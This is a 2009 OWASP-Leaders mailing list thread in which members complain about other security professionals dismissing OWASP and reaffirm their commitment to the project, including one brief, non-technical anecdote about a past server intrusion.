[Owasp-leaders] Would the real OWASP please stand up!

Eoin eoin.keary at owasp.org
Fri Sep 25 10:34:49 EDT 2009


Sure,
I started doing the testing guide (from Dan) and code review guides in order
to exercise my fingers!

2009/9/24 daniel cuthbert <daniel.cuthbert at owasp.org>

> This isn't something new, it's been happening since the late 90's.
> IT has always been full of people who might be technically gifted but often
> lacking in basic social skills. When we started OWASP back in the day, it
> wasn't about ego, or being leet, it was about helping fix the poor state of
> web 1.0. Many people rely on what we do, so who really gives a monkeys about
> what others think?
>
>
>
> 2009/9/23 Arturo 'Buanzo' Busleiman <buanzo at buanzo.com.ar>
>
>> I really hate it when "real" security professionals look down on me and
>> say "oh, you're the owasp
>> guy". For instance, I was talking the other day with someone from
>> another webappsec
>> organization, and basically, he said: "Sorry, you're an OWASP guy, I can't
>> talk to you". My answer
>> was: "Oh, I wasn't aware kindergarten had webappsec groups".
>>
>> Lots of people in the industry dislike my project just because it's OWASP
>> sponsored. And I don't
>> give a **** about the opinion of those individuals.
>>
>> The real OWASP is the people who can see beyond the stupidity and jealousy
>> of others, and kick it
>> away and continue to love OWASP and support it. I've been in the IT
>> security business since 1996 (I
>> was 14 years old at that time), when I hacked into Argentina's presidency's
>> email server and contacted
>> their "systems guy" and told him how to reproduce the attack, how to fix
>> it (it was an IRIX 5.3
>> operating system running a very vulnerable set of cgi scripts), and how to
>> start thinking about
>> security in a more open way ("use linux" - back in 1996 that was a blast
>> :P).
>>
>> And the past 3 years I've seen a big change in the industry. Lots of
>> "floss activists" becoming
>> "security experts", advanced "windows power users" becoming IT security
>> developers, and things like
>> that. And I sense that the hacker philosophy is being lost in a big noisy
>> inter-group flamewar full
>> of politics and bureaucratic stuff, when we should be focusing on
>> developing tools, analyzing
>> malware, educating programmers on how to write secure code, educating
>> users, and HACKING STUFF UP.
>>
>> And I've found LOTS of that kind of people in OWASP: real hackers with
>> real hacker philosophy and
>> code of ethics, great programmers. And that is why I'll continue to
>> support OWASP.
>>
>> (And I know, you, the childish guy-leader from the other webappsec group,
>> are reading this: grow up).
>>
>> And this will be my only public rant :)
>>
>> - --
>> Arturo "Buanzo" Busleiman / Arturo Busleiman @ 4:900/107
>> Independent Linux and Security Consultant - SANS - OISSG - OWASP
>> http://www.buanzo.com.ar/pro/eng.html
>> Mailing List Archives at http://archiver.mailfighter.net
>> _______________________________________________
>> OWASP-Leaders mailing list
>> OWASP-Leaders at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
>>
>


-- 
Eoin Keary CISSP CISA
https://www.owasp.org/index.php/OWASP_Ireland_AppSec_2009_Conference

OWASP Code Review Guide Lead Author
OWASP Ireland Chapter Lead
OWASP Global Committee Member (Industry)

http://asg.ie/
https://twitter.com/EoinKeary
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-leaders/attachments/20090925/85016bcf/attachment-0001.html 

